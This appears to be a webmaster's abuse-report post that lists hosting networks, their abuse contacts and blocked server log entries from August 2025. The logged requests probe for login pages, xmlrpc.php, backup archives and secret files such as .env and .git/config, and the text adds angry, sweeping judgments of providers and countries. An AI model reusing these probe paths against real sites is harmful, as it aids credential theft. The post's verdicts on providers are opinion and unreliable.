AS198605 – Gen Digital dba as Avast – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@avast.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
95.142.112.17 website*x.com – – [03/Aug/2025:15:16:16 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0“
95.142.112.17 website*x.com – – [03/Aug/2025:15:16:26 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
95.142.112.17 website*x.com – – [03/Aug/2025:15:16:26 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“

AS14956 – RouterHosting LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-reports@cloudzy.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
74.208.59.240 website*x.com – – [03/Aug/2025:19:41:30 +0200] „HEAD /backup.zip HTTP/1.0“ 403 – „-“ „-“
74.208.59.240 website*x.com – – [03/Aug/2025:19:41:30 +0200] „HEAD /Archive.zip HTTP/1.0“ 403 – „-“ „-“
74.208.59.240 website*x.com – – [03/Aug/2025:19:41:30 +0200] „HEAD /website*x.zip HTTP/1.0“ 403 – „-“ „-“
74.208.59.240 website*x.com – – [03/Aug/2025:19:41:30 +0200] „HEAD /website*x.com.zip HTTP/1.0“ 403 – „-“ „-“

HACKER-IDIOTEN VOM SAMSTAG, 02.08.25:

MAIL NR. 1 TODAY!

AS396982 – Google LLC – DAILY HACKER-IDIOTS IN THIS NETWORKS – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – THE ONLINE-FORMS ARE A ABSOLUTELY NOGO! – ABUSE PER EMAIL IS STANDARD!
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:44 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:44 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:44 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:44 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:44 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:44 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:45 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:45 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:45 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.231.27.158 website*x.com – – [02/Aug/2025:03:26:45 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

AS49453 – Global Layer B.V. – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@global-layer.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
134.19.182.123 website*x.com – – [02/Aug/2025:04:27:40 +0200] „GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

MAIL NR. 2 TODAY!

AS202306 – HOSTGLOBAL.PLUS LTD – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostglobal.plus – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:07 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.29 (KHTML, like Gecko) Version/10.1 Safari/603.1.29“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:07 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; he-il) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:08 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:08 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:08 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.3 Mobile/14E277 Safari/603.1.30“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:09 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 4.4.4; XT1080 Build/SU6-7.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:11 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; LG-L40G/V100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:12 +0200] „GET /phpinfo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:13 +0200] „GET /dev/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1“
78.153.140.222 website*x.com – – [02/Aug/2025:07:28:14 +0200] „GET /app_dev.php/_profiler/phpinfo HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10“

AS211590 – Bucklog SARL – DAILY HACKER-IDIOTS!!! VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/index HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/logs/HEAD HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/logs/refs/heads/master HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/logs/refs/heads/main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/logs/refs/remotes/origin/master HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/logs/refs/remotes/origin/main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.16 website*x.com – – [02/Aug/2025:07:55:44 +0200] „GET /.git/hooks/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
… and so on… and so on…

AS40676 – Psychz Networks – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostbudget.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
136.0.111.243 website*x.com – – [02/Aug/2025:02:13:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

MAIL NR. 3 TODAY!

AS25532 – LLC „MASTERHOST“ – RUSSIA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@masterhost.ru – MASTERHOST IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
90.156.142.68 website*x.com – – [02/Aug/2025:02:31:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
90.156.142.68 website*x.com – – [02/Aug/2025:10:05:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“

AS42846 – GNET Internet Telekomunikasyon A.S. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@guzel.net.tr – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a06:41c0:1:1::9168:964 website*x.com – – [02/Aug/2025:02:37:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

AS398101 – GoDaddy.com, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@godaddy.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!
2603:3:610c:cc20:: website*x.com – – [02/Aug/2025:02:43:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

MAIL NR. 4 TODAY!

AS62068 – SpectraIP B.V. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@spectraip.nl
5.182.209.204 website*x.com – – [02/Aug/2025:02:48:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“

AS398478 – PEG TECH INC – CHINA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostease.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.88.188.1 website*x.com – – [02/Aug/2025:02:54:45 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“

AS132335 – LEAPSWITCH NETWORKS PRIVATE LIMITED – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
reportabuse@leapswitch.com
103.250.186.101 website*x.com – – [02/Aug/2025:03:00:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 5 TODAY!

AS29757 – Webline Services Inc- COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@webline-services.com
23.168.193.186 website*x.com – – [02/Aug/2025:03:06:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“

AS14061 – DigitalOcean, LLC – VERY GOOD PROVIDER! – ALWAYS RESPOND TO OUR ABUSE EMAILS! – ALWAYS STOP THE HACKER IDIOTS VERY FAST!
abuse@digitalocean.com
138.197.201.180 website*x.com – – [02/Aug/2025:03:12:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“

AS53107 – EVEO S.A. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
security@eveo.com.br
186.209.113.104 website*x.com – – [02/Aug/2025:03:18:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 6 TODAY!

AS19871 – Network Solutions, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com,abuse@bluehost.com- NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
162.241.126.57 website*x.com – – [02/Aug/2025:03:24:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“

AS8075 – Microsoft CorporationVERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – THE ONLINE-FORMS ARE A ABSOLUTELY NOGO! – ABUSE PER EMAIL IS STANDARD!
52.231.97.229 website*x.com – – [02/Aug/2025:04:03:55 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.231.97.229 website*x.com – – [02/Aug/2025:04:03:55 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“

AS6802 – Bulgarian Research and Education Network Association (BREN) – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@acad.bg
194.141.86.36 website*x.com – – [02/Aug/2025:07:54:31 +0200] „GET /wp-content/themes/alone/js/main.js HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
194.141.86.36 website*x.com – – [02/Aug/2025:07:54:48 +0200] „GET /wp-content/themes/twentytwentyfive/inc/pricing-table-2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

MAIL NR. 7 TODAY!

AS55836 – Reliance Jio Infocomm Limited – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ip.abuse@ril.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2409:4070:2d4f:d0e6:8102:5e42:f5fa:c4b2 website*x.com – – [02/Aug/2025:10:42:12 +0200] „GET / HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“

AS51026 – Dade Pardazi Mobinhost Co LTD- IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@dadepardazimobin.com
81.12.27.106 website*x.com – – [02/Aug/2025:08:29:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“

MAIL NR. 8 TODAY!

AS63760 – AZDIGI Corporation VIETNAM IS COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! – TO MANY HACKER-IDIOTS EVERY DAY!
hoanglong@azdigi.com,hm-changed@vnnic.vn – HERE WITH 2 IP´S! – VERY UNSECURE PROVIDER!
103.221.221.13 website*x.com – – [02/Aug/2025:08:35:24 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
+
103.221.220.62 website*x.com – – [02/Aug/2025:08:52:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“

AS198610 – Beget LLC – RUSSIA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@beget.ru – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
5.101.157.127 website*x.com – – [02/Aug/2025:08:41:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS141995 – Contabo Asia Private Limited
abuse@contabo.de – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
84.247.144.53 website*x.com – – [02/Aug/2025:08:58:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“

MAIL NR. 9 TODAY!

AS396982 – Google LLC – VERY UNSECURE – DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – THE ONLINE-FORMS ARE A ABSOLUTELY NOGO! – ABUSE PER EMAIL IS STANDARD!
35.205.145.126 website*x.com – – [02/Aug/2025:09:04:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“

AS51167 – Contabo GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
95.111.242.227 website*x.com – – [02/Aug/2025:09:09:50 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

AS55293 – A2 Hosting, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@a2hosting.com
185.146.22.245 website*x.com – – [02/Aug/2025:09:27:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

MAIL NR. 10 TODAY!

AS134732 – Dot Internet – VERY UNSECURE – DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dotcomisp@gmail.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.217.111.50 website*x.com – – [02/Aug/2025:09:32:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“

AS23352 – DEFT.COM – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@deft.com
75.102.58.50 website*x.com – – [02/Aug/2025:09:38:03 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“

AS31034 – Aruba S.p.A. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@staff.aruba.it
89.46.109.92 website*x.com – – [02/Aug/2025:09:43:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“

MAIL NR. 11 TODAY!

AS4780 – Digital United Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hostmaster@twnic.tw,ccyang@du.net.tw
61.59.6.105 website*x.com – – [02/Aug/2025:09:48:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“

AS51713 – WHG Hosting Services Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@worldhost.group – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
77.95.113.11 website*x.com – – [02/Aug/2025:09:54:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca
135.125.240.194 website*x.com – – [02/Aug/2025:09:59:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“

MAIL NR. 12 TODAY!

AS396982 – Google LLC – DAILY HACKER-IDIOTS IN THIS NETWORKS – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – THE ONLINE-FORMS ARE A ABSOLUTELY NOGO! – ABUSE PER EMAIL IS STANDARD!
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:30 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:31 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:31 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:31 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:31 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:31 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:31 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:31 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:32 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.230.92.5 website*x.com – – [02/Aug/2025:10:06:32 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

AS8560 – IONOS SE – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ionos.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
